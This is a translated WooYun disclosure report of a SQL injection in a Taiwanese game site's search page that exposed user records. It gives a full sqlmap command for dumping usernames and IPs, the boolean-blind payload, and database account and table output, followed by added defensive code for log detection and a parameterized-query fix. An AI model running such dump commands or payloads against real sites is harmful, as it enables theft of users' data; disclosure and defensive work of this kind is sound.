Vulnerability summary

Defect ID: wooyun-2015-0161077

Title: SQL injection in the League of Legends site of 台灣開心遊戲網 (Hehagame) (leaks 220,000 user records + 2.97 million site log entries) (Taiwan region)

Vendor: 台灣開心遊戲網

Author: 路人甲

Submitted: 2015-12-14 13:33

Fixed: 2016-01-28 17:10

Published: 2016-01-28 17:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed over to a third-party partner organization (HITCON Taiwan Internet Vulnerability Reporting Platform) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-12-14: Details sent to the vendor; awaiting vendor handling
2015-12-15: Vendor confirmed; details visible to the vendor only
2015-12-25: Details disclosed to core white hats and experts in related fields
2016-01-04: Details disclosed to regular white hats
2016-01-14: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public

Brief description:

Hehagame (開心遊戲網) is one of the few gaming media sites in Hong Kong and Taiwan that covers online games, e-sports, PC single-player games and the games industry at the same time. As a newcomer among professional online-game media sites, hehagame is a leading online-game media outlet in Taiwan and Hong Kong; in game coverage, news, downloads and player interaction it has quickly taken a leading position in the industry. hehagame now has a complete and extensive game-information system, offering news, downloads and player interaction for hundreds of games. As a game-information outlet, hehagame collects rich game content for the gaming community in the spirit of a bee, and as pioneering game-information people it is committed to developing a range of services aimed at players and navigation sections aimed at the industry, genuinely advancing the game-entertainment business.

Detailed description:

URL: http://**.**.**.**/searchart.php?id=&gid=16866&artname=M&button=

$ python sqlmap.py -u "http://**.**.**.**/searchart.php?id=&gid=16866&artname=M&button=" -p gid --technique=B --output-dir=output --random-agent --batch --no-cast -D bezirk -T bezirk_lucky_member -C username,id,ip,game,credit,uid --dump --start 1 --stop 20


+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| bezirk_lucky_log            | 2978911 |
| bezirk_lucky_member         |  223553 |
+-----------------------------+---------+



Proof of vulnerability:

---
Parameter: gid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=&gid=16866) AND 8249=8249 AND (3398=3398&artname=M&button=
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
current user: 'db@link#135!heha'@'192.168.0.%'
current user is DBA: False
database management system users [2]:
[*] 'db@link#135!heha'@'192.168.0.%'
[*] 'mydbroot135'@'localhost'
available databases [30]:
current database: 'bezirk'
Database: bezirk
Table: bezirk_lucky_member
[7 columns]
+----------+------------------+
| Column | Type |
+----------+------------------+
| credit | int(10) unsigned |
| game | char(10) |
| id | int(10) unsigned |
| ip | char(15) |
| role | varchar(30) |
| uid | int(10) unsigned |
| username | varchar(30) |
+----------+------------------+

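Because the site runs behind Nginx, the same probing can be found after the fact in the access log. The following Python example is added here and is not part of the report: it runs over constructed log lines (not real traffic), URL-decodes every query-string parameter and flags the `) AND n=n` comparison shape of the report's boolean-blind payload, returning the response size so that true/false request pairs with differing sizes stand out.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Nginx access-log lines (not from the report). The second and third
# carry the report's boolean-blind payload and its false twin, URL-encoded as a
# scanner would send them; only the response size differs between the pair.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Dec/2015:13:30:01 +0800] "GET /searchart.php?id=&gid=16866&artname=M&button= HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Dec/2015:13:31:42 +0800] "GET /searchart.php?id=&gid=16866%29%20AND%208249%3D8249%20AND%20%283398%3D3398&artname=M&button= HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Dec/2015:13:31:43 +0800] "GET /searchart.php?id=&gid=16866%29%20AND%208249%3D8250%20AND%20%283398%3D3398&artname=M&button= HTTP/1.1" 200 218 "-" "Mozilla/5.0"
"""

# Combined-format request line: client, timestamp, method, target, status, bytes.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+)')

# After URL-decoding, the report's payload reads "16866) AND 8249=8249 AND (3398=3398":
# a closing parenthesis followed by an injected numeric comparison.
BLIND_RE = re.compile(r'\)\s*AND\s+\d+\s*=\s*\d+', re.IGNORECASE)


def flag_blind_injection(log_text):
    """Return (client ip, parameter name, decoded value, response bytes) for each
    request whose query string carries a boolean-blind style comparison."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes values, so encoded payloads are seen in clear
        for name, value in parse_qsl(query, keep_blank_values=True):
            if BLIND_RE.search(value):
                hits.append((m.group("ip"), name, value, int(m.group("bytes"))))
    return hits
```
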
Remediation:

Put a WAF in front of it.
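A WAF only filters requests; the injection itself is removed in the application by sending gid to the database as a bound parameter instead of SQL text. The following Python/sqlite3 example is added here and is not the site's code: it assumes the query behind searchart.php has the `WHERE (gid = ...)` shape implied by the report's payload, uses a constructed table, and checks that the report's true/false payload pair changes the result of the concatenated query but not of the parameterized one.

```python
import sqlite3

# Constructed stand-in for the article table behind searchart.php; the table and
# column names other than gid are assumptions, not taken from the report.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE articles (id INTEGER, gid INTEGER, artname TEXT)")
    con.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                    [(1, 16866, "hero guide"), (2, 16867, "patch notes")])
    return con

# Vulnerable shape: gid is spliced into the SQL text. The parentheses mirror what
# the report's payload implies (it closes one group and opens another).
def search_vulnerable(con, gid):
    sql = "SELECT id, artname FROM articles WHERE (gid = " + gid + ")"
    return con.execute(sql).fetchall()

# Hardened: gid is validated as numeric and passed as a bound parameter, so the SQL
# the engine parses is fixed regardless of what the client sends.
def search_safe(con, gid):
    if not gid.isdigit():
        return []
    return con.execute("SELECT id, artname FROM articles WHERE (gid = ?)",
                       (int(gid),)).fetchall()

# Boolean-based blind testing sends a pair of requests whose injected comparison is
# true in one and false in the other and compares the responses.
TRUE_PAYLOAD = "16866) AND 8249=8249 AND (3398=3398"    # value from the report
FALSE_PAYLOAD = "16866) AND 8249=8250 AND (3398=3398"   # constructed false twin

def leaks_one_bit(search):
    """True if the true/false pair yields different results, i.e. the endpoint
    still works as a boolean oracle; a regression check for the fix."""
    con = make_db()
    return search(con, TRUE_PAYLOAD) != search(con, FALSE_PAYLOAD)
```
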

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-12-15 23:31

Vendor reply:

Thanks for the report

Latest status:

None yet